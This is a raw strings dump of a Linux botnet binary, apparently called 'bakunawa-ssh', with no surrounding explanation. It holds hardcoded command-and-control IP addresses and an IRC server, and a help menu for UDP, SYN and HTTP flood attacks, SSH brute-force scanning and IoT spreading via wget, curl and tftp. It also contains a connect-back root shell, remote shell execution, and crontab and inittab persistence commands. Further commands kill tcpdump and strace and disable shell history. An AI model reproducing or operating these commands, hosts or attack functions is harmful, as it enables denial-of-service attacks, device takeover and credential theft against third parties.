/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
strcpy
htonl
htons
srand
fopen
strncmp
connect
inet_ntoa
signal
strncpy
getpriority
fork
time
daemon
listen
select
_exit
vsprintf
popen
getpid
kill
strdup
flock
strtok
feof
fgets
getppid
strlen
send
memset
strstr
__errno_location
bind
read
toupper
dup2
shutdown
inet_network
stdout
fputc
recv
inet_addr
fputs
memcpy
fclose
setsockopt
malloc
umask
strcasecmp
realpath
bzero
getenv
ioctl
system
gethostbyname
getuid
execve
pclose
getcwd
bcopy
atoi
atol
waitpid
strchr
fprintf
sendto
accept
sleep
setsid
getdtablesize
access
strcmp
__libc_start_main
setpriority
write
ntohl
snprintf
free
GLIBC_2.3
GLIBC_2.1
GLIBC_2.0
PTRh
QVhK
/dev
/shm
/var
/tmp
/var
/locf
/var
/run
/tmp
gfff
gfff
gfff
gfff
gfff
gfff
gfff
[^_]
[^_]
[^_]
[^_]
[^_]
[^_]
a```
gfff
gfff
gfff
gfff
gfff
gfff
gfff
gfff
gfff
[^_]
[^_]
[^_]
\[^_]
l[^_]
< t-
/dev
/shm
/var
/tmp
/tmp
/var
/locf
/var
/run
cat 
/etc
/ini
ttab
2 > 
/etc
/ini
ttab
rm -
rf /
etc/
init
tab2
touc
h -a
cmr 
/bin
/ls 
/etc
/ini
ttab
[^_]
142.44.163.168
192.99.71.250
142.44.240.14
121.128.171.44
66.70.190.236
irc.de-zahlung.eu
loop
inet
lan0
inet0
eth0
eth1
killall -9 tcpdump > /dev/null 2>&1 &
killall -9 strace > /dev/null 2>&1 &
/tmp/ttexec
touch /tmp/gates.lod
/proc/%d/cmdline
ltrace
strace
LD_PRELOAD
/dev/shm/
/var/tmp/
/var/lock/
/var/run/
/tmp/
.muhstikx86.rules
%s/%s
[+] Already running...
/dev/null
/etc/issue
/proc/version
[+] Already running... IS
[+] Already running... SE
rm -rf /var/run/1sh > /dev/null 2>&1 &
rm -rf /tmp/2sh > /dev/null 2>&1 &
rm -rf /var/run/tty* > /dev/null 2>&1 &
rm -rf /tmp/tty* > /dev/null 2>&1 &
rm -rf /var/run/pty > /dev/null 2>&1 &
killall -9 tty0 > /dev/null 2>&1 &
killall -9 tty1 > /dev/null 2>&1 &
killall -9 tty2 > /dev/null 2>&1 &
killall -9 tty3 > /dev/null 2>&1 &
killall -9 tty4 > /dev/null 2>&1 &
killall -9 tty5 > /dev/null 2>&1 &
killall -9 tty6 > /dev/null 2>&1 &
killall -9 arm > /dev/null 2>&1 &
killall -9 mips > /dev/null 2>&1 &
killall -9 mipsel > /dev/null 2>&1 &
killall -9 powerpc > /dev/null 2>&1 &
killall -9 ppc > /dev/null 2>&1 &
killall -9 daemon.armv4l.mod > /dev/null 2>&1 &
killall -9 daemon.i686.mod > /dev/null 2>&1 &
killall -9 daemon.mips.mod > /dev/null 2>&1 &
killall -9 daemon.mipsel.mod > /dev/null 2>&1 &
rm -rf /tmp/.xs/* > /dev/null 2>&1 &
kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &
NOTICE %s :Unable to comply.
/bin/uname
/bin/uname -n
hostname || echo unknown
/bin/nvram
/usr/sbin/nvram
nvram get router_name
/etc/ISP_name
cat /etc/ISP_name
/etc/Model_name
cat /etc/Model_name
1234567890
i386|c
%s|%d|%c%c%c%c%c%c|unknown
%s|%d|%c%c%c%c%c%c|%s
%s : USERID : UNIX : %s
NOTICE %s :GET <host> <save as>
NOTICE %s :Unable to create socket.
http://
NOTICE %s :Unable to resolve address.
NOTICE %s :Unable to connect to http.
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
alula
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
NOTICE %s :Receiving file.
NOTICE %s :Saved as %s
NOTICE %s :Removed all spoofs
NOTICE %s :What kind of subnet address is that? Do something like: 169.40
NOTICE %s :UNRESOLVABLE!!! 
NOTICE %s :UDP <target> <port> <secs>
NOTICE %s :Packeting %s.
NOTICE %s :UNKNOWN <target> <secs>
NOTICE %s :Unknowning %s.
NOTICE %s :SUDP <target> <port> <secs>
NOTICE %s :STD <target> <port> <secs>
NOTICE %s :[STD]Hitting %s!
NOTICE %s :[STD]Done hitting %s!
NOTICE %s :STD2 <target> <port> <secs> <funny_data>
NOTICE %s :[STD2]Hitting %s!
NOTICE %s :[STD2]Done hitting %s!
NOTICE %s :PAN <target> <port> <secs>
NOTICE %s :Panning %s.
NOTICE %s :XMAS <target> <port> <secs> <cwr,ece,urg,ack,psh,rst,fin,syn or null> <random/not>
NOTICE %s :Merry XMAS to %s w/ %s 
null
random
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Mozilla/5.0 (iPad; CPU OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.4.4 (KHTML, like Gecko) Version/9.0.3 Safari/601.4.4
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/537.86.3
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.106 Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0
Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D15 Safari/601.1
Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/47.0.2526.73 Chrome/47.0.2526.73 Safari/537.36
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:43.0) Gecko/20100101 Firefox/43.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY~!@#$%^&*()-+_<>?/:;}{][
%c%c
%c%c%c
%c%c%c%c
%c%c%c%c%c
A Santa lives evil at NASA
%c%c%c%c%c%c
%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c
NOTICE %s :l7.unknown <target> <port> <time> <threads> </shit.php?id=> <random/not> <(n if random) or not> <GET/HEAD/POST>
NOTICE %s :max of 64 threads per butt.
NOTICE %s :fuckoff..
NOTICE %s :giving this fucktard what he needs...
HEAD
Tacocat
%s %s%s HTTP/1.1
Host: %s
User-Agent: %s
%s %s HTTP/1.1
Host: %s
User-Agent: %s
POST %s%s HTTP/1.1
Host: %s 
User-Agent: %s 
Connection: keep-alive 
Keep-Alive: %s 
Content-Length: %s 
Content-Type: application/x-www-form-urlencoded
POST %s HTTP/1.1
Host: %s 
User-Agent: %s 
Connection: keep-alive 
Keep-Alive: %s 
Content-Length: %s 
Content-Type: application/x-www-form-urlencoded
NOTICE %s :unknowning on %s done!
NOTICE %s :l7.unknown2 <targetip> <host_header> <port> <time> <threads> </shit.php?id=> <random/not> <(n if random) or not> <GET/HEAD/POST>
NOTICE %s :max of 256 threads per butt.
NOTICE %s :junk <target> <port> <time> <threads>
NOTICE %s :junkflood on %s done!
NOTICE %s :junk <target> <port> <time> <threads> <payload or junk>
NOTICE %s :%s got octofucked.
NOTICE %s :DNS <host>
NOTICE %s :Resolving %s...
NOTICE %s :Unable to resolve.
NOTICE %s :Resolved to %s.
Beeb
NOTICE %s :Spoofs: %d.%d.%d.%d
NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
/bin/sh
TERM=linux
BASH_HISTORY=/dev/null
HISTORY=/dev/null
history=/dev/null
HISTFILE=/dev/null
HISTFILESIZE=0
PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin
NOTICE %s :CBACK <ip> <port>
NOTICE %s :here comes the cherry...
[+] Welcome to bakunawa cback shell %s...
echo [+] you logged in at `date`
echo [+] `uname -a || cat /proc/version`
[+] you got root rights, enjoy!
1.0+tftp_jun112017
NOTICE %s :
bakunawa-ssh
 v.%s
NOTICE %s :
SHELP
 ===> ssh scanning functions help
NOTICE %s :
DHELP
 ===> ddos functions help
NOTICE %s :
Other commands:
NOTICE %s :
DNS <domain>
 ===> domain to ip
NOTICE %s :
SPOOFS <iprange/ip>
 ===> set spoofing range or ip
NOTICE %s :
KILLALL
 ===> kill background threads or current packeting
NOTICE %s :
GETSPOOFS
 ===> just get spoofs.
NOTICE %s :
GET <url> <save as>
 ===> handy downloader 
NOTICE %s :
IRC <arg1> <arg2> <arg...>
 ===> send raw irc commands to server
NOTICE %s :
SH <arg1> <arg2> <arg...>
 ===> execute shell commands
NOTICE %s :
CBACK <ip> <port>
 ===> connectback shell 29062015
NOTICE %s :
VERSION
 ==> version and some other info.
NOTICE %s :
HELP
 ==> displays this ofc.
NOTICE %s :
bakunawa-ssh
 | powered by libssh ;) 
NOTICE %s :Scanning Functions (uses the big passlist) | pre: [g+] 
NOTICE %s :
SCAN <192 or 192.168 or 192.168.0> <threads> <minutes>
 ===> Random Scan
Eleele
NOTICE %s :^ scans a class for weak ssh credentials. free socks for everyone. 
NOTICE %s :Spreading functions (uses the small passlist) | pre: [s+] 
NOTICE %s :
SPREAD <192 or 192.168 or 192.168.0> <threads> <minutes> <http_address> <tftp_host>
 ===> Random Scan
NOTICE %s :
SPREADX <192 or 192.168 or 192.168.0> <threads> <minutes> <user> <passwd>  <http_host> <tftp_host>
 ===> Random Scan
NOTICE %s :^ spreads on IoT, via wget,curl and tftp. internet connected dildos will be infected. 
soon
NOTICE %s :http_address/1sh = wget /var/run | http_address/2sh = wget /tmp | http_address/3sh = curl
NOTICE %s :tftp_host/tsh | cd /var/run + cd /tmp + cd /dev/shm 
NOTICE %s :
bakunawa-ssh
DDOS
 methods
NOTICE %s :Layer 4 Attacks 
NOTICE %s :
XMAS <target> <port> <secs> <cwr,ece,urg,ack,psh,rst,fin,syn or null> <random/not>
 ===> messy raw_tcp_packet generator.
NOTICE %s :
PAN <target> <port> <secs>
 ===> advanced syn flooder that will kill most network drivers
NOTICE %s :
SUDP <target> <port> <secs>
 ===> UDP flood! 
NOTICE %s :
UDP <target> <port> <secs>
 ===> UDP flood! w/out 
NOTICE %s :
STD <target> <port> <secs>
 ===> Fucks target so dirty they get an STD. (recommended for non-root users) 
NOTICE %s :
STD2 <target> <port> <secs> <trash_data>
God A red nugget A fat egg under a dog
 ===> STD on drugs. 
NOTICE %s :
UNKNOWN <target> <secs>
 ===> never use this. #unknownnever 
NOTICE %s :Layer 7 Attacks 
NOTICE %s :
junk <target> <port> <time> <threads>
 ===> fast tcp connect() flooder. sends 1 byte trash data. 
NOTICE %s :
l7.unknown <target> <port> <time> <threads> </shit.php?id=> <random/not> <(n if random) or not> <GET/HEAD/POST>
NOTICE %s :
 a mysterious layer7 attack, websites are kill. max:
 threads. cuz I'm dumb
NOTICE %s :
l7.unknown2 <targetip> <host_header> <port> <time> <threads> </shit.php?id=> <random/not> <(n if random) or not> <GET/HEAD/POST>
NOTICE %s :
 same as above but max:
 256
 threads, it might hold.
NOTICE %s :
__________
NOTICE %s :
!* m.off , !* m.on
 packeting messages. off by default. current state is 
m.off
NOTICE %s :
!* m.off , !* m.on
  packeting messages. off by default. current state is 
m.on
NOTICE %s :
bakunawa-ssh
 by x00 v.%s
NOTICE %s :
codes
 and 
ideas
 ripped from: 
NOTICE %s :|- kaiten, knight, ktx 
NOTICE %s :|- rbot/rxbot  
NOTICE %s :|- BoSSaBoT 
NOTICE %s :|- sshgodscan  
NOTICE %s :|- hydra  
NOTICE %s :|- lightaidra  
NOTICE %s :|- lizkebab/torlus/qbot/gayfgt 
NOTICE %s :|- mirai 
NOTICE %s :|- libssh/libssh2 
NOTICE %s :|- xmas_td 
NOTICE %s :|- sockstress  
NOTICE %s :|- std by stackd, vadim 
NOTICE %s :`  UPX, sstrip  
NOTICE %s :greetz to: coldzero, Jorgee, justaguy/a, M/maiki, maphex (thx4ircd), st0n3d
NOTICE %s :#1 rule of using this: 
NOTICE %s :
you do not talk about bakunawa.
NOTICE %s :if you have this, dont leak it, even to your mother.
NOTICE %s :MOVE <server>
NOTICE %s :Killing pid %d.
abcdefghijklmnopjrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
NOTICE %s : %s
XMAS
SUDP
STD2
UNKNOWN
JUNK
L7.UNKNOWN
L7.UNKNOWN2
Degas are we not drawn onward no In union drawn onward to new eras aged
CBACK
KILLALL
GETSPOOFS
SPOOFS
VERSION
SERVER
HELP
SHELP
DHELP
m.on
m.off
RANDOM
IRC 
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
NOTICE %s :%s
MODE %s -xi
MODE %s +B
JOIN %s :%s
PONG %s
NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
ERROR
PRIVMSG
JOIN
PING
NICK
echo "nameserver 8.8.8.8" > /etc/resolv.conf &
[+] Running on %s
/bin/crontab
/usr/bin/crontab
chmod 700 %s > /dev/null 2>&1 &
touch -acmr /bin/ls %s
(crontab -l | grep -v "%s" | grep -v "no cron" | grep -v "lesshts/run.sh" > %s/.x00%u) > /dev/null 2>&1
echo "* * * * * %s > /dev/null 2>&1 &" >> %s/.x00%u
crontab %s/.x00%u
rm -rf %s/.x00%u
[+] no cronnie...
[+] forget it. 
[+] you are root tho. 
test
cat /etc/inittab | grep -v "%s" > /etc/inittab2
echo "0:2345:respawn:%s" >> /etc/inittab2
/etc/rc.local
/etc/rc.conf
"%s%s"
#i386
0599
NICK %s
USER x00 localhost localhost :%s
;*2$"
GCC: (Debian 4.7.2-5) 4.7.2
GCC: (Debian 4.4.7-2) 4.4.7
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.5730
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
Borrow or rob
main.c
textBuffer.4710
i.4879
random_string
rnd_str.5202
flooders
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
identd
setsockopt@@GLIBC_2.0
__libc_csu_fini
execfile
junk
spoofs
dup2@@GLIBC_2.0
strstr@@GLIBC_2.0
strcmp@@GLIBC_2.0
silent
__i686.get_pc_thunk.bx
cback
read@@GLIBC_2.0
_ITM_deregisterTMCloneTable
xmas
data_start
printf@@GLIBC_2.0
_352
stopall
tcpfuck
msgs
dup@@GLIBC_2.0
_exit@@GLIBC_2.0
inet_network@@GLIBC_2.0
dhelp
free@@GLIBC_2.0
l7_unknown
strdup@@GLIBC_2.0
in_cksum
memcpy@@GLIBC_2.0
mfork
bzero@@GLIBC_2.0
fgets@@GLIBC_2.0
childs
_edata
fclose@@GLIBC_2.1
time@@GLIBC_2.0
inet_ntoa@@GLIBC_2.0
signal@@GLIBC_2.0
daemonize
sleep@@GLIBC_2.0
select@@GLIBC_2.0
chan
_fini
sudp
popen@@GLIBC_2.1
l7_unknown2
std2
getuid@@GLIBC_2.0
getpriority@@GLIBC_2.0
msleep
user
pids
htons@@GLIBC_2.0
filter
_PING
servers
ioctl@@GLIBC_2.0
_NICK
accept@@GLIBC_2.0
changeservers
bcopy@@GLIBC_2.0
waitpid@@GLIBC_2.0
_sshkill
strcpy@@GLIBC_2.0
getpid@@GLIBC_2.0
servkill
daemon@@GLIBC_2.0
getenv@@GLIBC_2.0
malloc@@GLIBC_2.0
setpriority@@GLIBC_2.0
__data_start
spoofsm
unknown
puts@@GLIBC_2.0
tcptrash
spoof
system@@GLIBC_2.0
noisy
ntohl@@GLIBC_2.0
getdtablesize@@GLIBC_2.0
__gmon_start__
exit@@GLIBC_2.0
kill@@GLIBC_2.0
__dso_handle
realpath@@GLIBC_2.3
open@@GLIBC_2.0
flock@@GLIBC_2.0
pclose@@GLIBC_2.1
_IO_stdin_used
setsid@@GLIBC_2.0
feof@@GLIBC_2.0
srand@@GLIBC_2.0
strchr@@GLIBC_2.0
getcwd@@GLIBC_2.0
strlen@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0
fprintf@@GLIBC_2.0
execve@@GLIBC_2.0
write@@GLIBC_2.0
version
strcasecmp@@GLIBC_2.0
atol@@GLIBC_2.0
__libc_csu_init
server
Send
bind@@GLIBC_2.0
_433
fopen@@GLIBC_2.1
memset@@GLIBC_2.0
snprintf@@GLIBC_2.0
_end
__errno_location@@GLIBC_2.0
rand_ua
_PRIVMSG
strncpy@@GLIBC_2.0
_start
numservers
_fp_hw
numpids
bindport
lockfile
rand@@GLIBC_2.0
access@@GLIBC_2.0
Do nine men interpret Nine men I nod
stdout@@GLIBC_2.0
host2ip
makestring
__bss_start
vsprintf@@GLIBC_2.0
getspoof
main
sendto@@GLIBC_2.0
strtok@@GLIBC_2.0
fork@@GLIBC_2.0
htonl@@GLIBC_2.0
listen@@GLIBC_2.0
toupper@@GLIBC_2.0
names
fputc@@GLIBC_2.0
ident
_Jv_RegisterClasses
random_test
silence
strwildmatch
octopus
antis
_376
help
check
sprintf@@GLIBC_2.0
getppid@@GLIBC_2.0
atoi@@GLIBC_2.0
running
socket@@GLIBC_2.0
__TMC_END__
disabled
_ITM_registerTMCloneTable
sock
inet_addr@@GLIBC_2.0
strncmp@@GLIBC_2.0
nick
umask@@GLIBC_2.0
gethostbyname@@GLIBC_2.0
randnum
shelp
shutdown@@GLIBC_2.0
dispass
fputs@@GLIBC_2.0
connect@@GLIBC_2.0
getspoofs
_init
recv@@GLIBC_2.0
close@@GLIBC_2.0
move
send@@GLIBC_2.0
numnames
